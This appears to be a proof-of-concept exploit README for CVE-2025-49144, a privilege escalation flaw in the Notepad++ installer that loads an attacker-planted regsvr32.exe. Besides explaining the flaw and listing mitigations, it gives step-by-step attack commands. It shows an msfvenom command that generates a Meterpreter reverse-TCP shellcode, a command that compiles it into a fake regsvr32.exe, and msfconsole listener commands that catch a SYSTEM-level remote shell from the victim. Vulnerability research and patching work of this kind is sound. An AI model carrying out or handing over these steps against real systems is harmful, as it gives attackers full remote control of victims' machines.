## https://sploitus.com/exploit?id=87B0C7B9-72B6-54F3-A86A-CC4A11AB115F
# notepad-v8.8.1-LPE-CVE-
CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-level POC

π CVE-2025-49144 is a high-severity local privilege escalation vulnerability found in the Notepad++ v8.8.1 and prior version installers. This vulnerability stems from uncontrolled executable search path behavior during installation, allowing a local attacker to gain SYSTEM-level privileges by placing malicious executables in the same directory as the installer.
βοΈ How the CVE works β Step-by-Step:
π§± 1. What went wrong in the installer?
The Notepad++ installer (before v8.8.2) calls regsvr32.exe to register some components β but it does this without giving the full path (like C:\Windows\System32\regsvr32.exe).
Instead, it just runs:
regsvr32.exe some_dll
π 2. Windows search path behavior: When an executable is launched without a full path, Windows uses a specific search order to find the file:
The folder from which the application was launched (e.g., Downloads)
The system folder (System32)
The Windows folder
Current working directory
Paths in PATH environment variable
So, if a fake regsvr32.exe is placed in the same folder as the installer (e.g., Downloads), Windows will use it before the real one.
π£ 3. Exploitation:
- Attacker places a malicious regsvr32.exe in the same folder as the legitimate Notepad++ installer (e.g., the victim's Downloads folder).
- Victim runs the installer (thinking itβs safe).
- Installer calls regsvr32.exe, but ends up executing the malicious one from the same folder β with SYSTEM privileges (because installers typically request admin permissions).
- The attacker's payload is now running as NT AUTHORITY\SYSTEM.
βοΈ Steps to Reproduce:
Get shell code:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
Download the file "regsvr32_loader.c" and edit it.
Paste entire shellcode from shellcode.txt in the mentioned comment.
Compile to regsvr32.exe:
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
Deploy a meterpreter listner:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
run
Download a vulnerable version of Notepad++ i.e. prior to 8.8.1 as 8.8.1 is now auto-updated.For PoC I have used Notepad++ v8.6.8
Move the file "regsvr32.exe" into the windows system in the same folder of the notepad++ installer, probably in the Downloads folder.
Complete the Installation of the Notepad++ installer.
Note: This is a PoC thus tested with Windows defender and real time protection disabled.
β Mitigation
Users and administrators should:
Upgrade to Notepad++ v8.8.2 or later
Restrict software installation to trusted admins
Use AppLocker, WDAC, or Software Restriction Policies (SRP) to:
Block execution from user-writeable folders (e.g., Downloads)
Prevent execution of untrusted binaries like regsvr32.exe from unauthorized paths
Enforce code signing for executables
Security teams should regularly audit install paths, monitor write permissions, and observe behavior during installer execution to reduce attack surface.
π·οΈ License
MIT License β Free for educational, research, and defensive purposes only.
π€ Contributing
Pull Requests welcome β improve detection, add features, or suggest fixes.